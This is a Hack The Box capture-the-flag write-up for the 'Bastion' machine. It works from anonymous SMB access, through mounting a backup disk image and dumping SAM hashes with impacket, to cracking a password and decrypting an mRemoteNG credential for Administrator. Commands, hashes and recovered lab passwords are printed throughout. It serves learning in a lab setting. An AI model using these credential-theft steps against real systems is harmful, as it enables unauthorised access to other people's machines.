Bastion HTB

10.10.10.134

Nmap

sudo nmap -sV -sC -A nmap_results 10.10.10.134

Most likely a windows server 2016
NetBIOS name BASTION\x00

Full port scan to make sure we dont miss anything

nmap -T5 -p- 10.10.10.134

Ports:

22:SSH

135:RPC

445:SMB

5985:Windows Remote Management (winrm)

47001:Windows Remote Management listener

Let's start by enumerating SMB

SMB enumeration

Let's see if anonymous login is enabled

crackmapexec smb 10.10.10.134 -p anonymous -u anonymous --shares

We can use crackmapexec to check if anonymous login is enabled and list any shares

It is enabled and we have read access to the share Backups.

Let's access the share, for this we can smbclient but it's worth getting some extra practice using impacket.

impacket-smbclient anonymous:anonymous@10.10.10.134

let's download note.txt and view the contents

get note.txt

Contents of note.txt

This is interesting the other files within the share must be quite large, worth investigating, what we can do is mount the share and explore the contents.

First lets create a directory for the mount point

mkdir Backups

Now we can mount to the Backups share

sudo mount -t cifs -o username=anonymous //10.10.10.134/Backups Backups

Let's move into the Backups share and list its contents

looking through WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351 we see two virtual hard disk files.

as Virtual Hard Disk (VHD) files are typically used to backup data stored on a hard-disk partition. As such, the data stored on a .vhd file is very interesting since it may contain sensitive information.

We do have 2 problems though

We are working within a Linux environment, and we dont really want to set up a Windows VM just to read these files but it is an option, as these VHD files are not the easiest to read in a Linux environment.
The VHD files are stored in a remote share, if we wish to download the share it could take a large amount of time due to the size of the files.

But what we can do is use a tool called guestmount, first, we need to install the following.

sudo apt-get install libguestfs-tools

Lets create another mount point in our /mnt directory

sudo mkdir /mnt/vhd

Now we can use guestmount to mount to our Backups directory and view the contents of the VHD Files.

sudo guestmount --add Backups/WindowsImageBackup/L4mpje-PC/Backup\ 2019-02-22\ 124351/9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd --inspector --ro /mnt/vhd

when we navigate to /mnt/vhd

we can see we are in the C drive of the file system

What we can do is navigate over to the /Windows/system32/config Directory and copy the SAM and SYSTEM files as these are registry hives

Why do we want the SAM and SYSTEM files, we want to dump hashes from the system.

the SAM file holds the Encrypted user database
the SYSTEM file holds the boot key for the Encrypted database

Dumping hashes

In our working directory we should have both the SAM and SYSTEM files, we can use Impacket to dump the users hashes

impacket-secretsdump -sam SAM -system SYSTEM local

We have the following hashes

Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9::

When looking at the Administrators Hash we can see the hash is blank, 31d6 means nothing, same with aad3b as a NTLM hash
we have the user L4mpje hash 26112010952d963c8dc4217daec986d9

What we can do is see if L4mpje has write access over the C$ share and if so we can use psexec and get admin. to check we can use smbmap

smbmap -u L4mpje -p aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9 -H 10.10.10.134

-p: is the users NTLM hash as we are passing it through

But does not seem to be the case

What we can do is crack the hash and see if we can SSH in.

we have successfully cracked the hash

26112010952d963c8dc4217daec986d9: bureaulampje

Lets SSH into the machine

ssh L4mpje@10.10.10.134

Privilege escalation via L4mpje

First Let's check the system information

we get an access denied

our privileges give us nothing special

if we look at the administrators group we find something weird

net localgroup administrators

Administrator is the only member of the group, but as we can recall from earlier the administrators hash was null

Lets look deeper into this

net user administrator

we can see the administrator has recently logged in.

Lets see when we SAM and SYSTEM file were last updated.

we can see the administrator's last password change was well after this SAM and SYSTEM backup files were created.

so now we know there is indeed an administrator user on the system.

Let's navigate to the C:\ directory and work our way up from there.

When viewing the Program Files (x86) directory we can see a unusual program running.

mRemoteNG: a tool to manage remote connections with other computer systems, makes sense being in a bastion host (jumpbox) let's see if it could help us escalate our privileges

If we look within the config file we do find the encoded password hash

We can use the following script to decode the base64 sha1 salted hash

Running the command (I did change the name since I only copied and paste it to my system)

python3 dc_mremote.py -s "aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAo
wVRdC7emf7lWWA10dQKiw=="                       
Password: thXLHM96BeKL0ER2

Now we have the password! lets SSH into the machine

ssh administrator@10.10.10.134

woohoo we are now the administrator

PreviousQuerier HTB NextBastard HTB

Last updated 1 year ago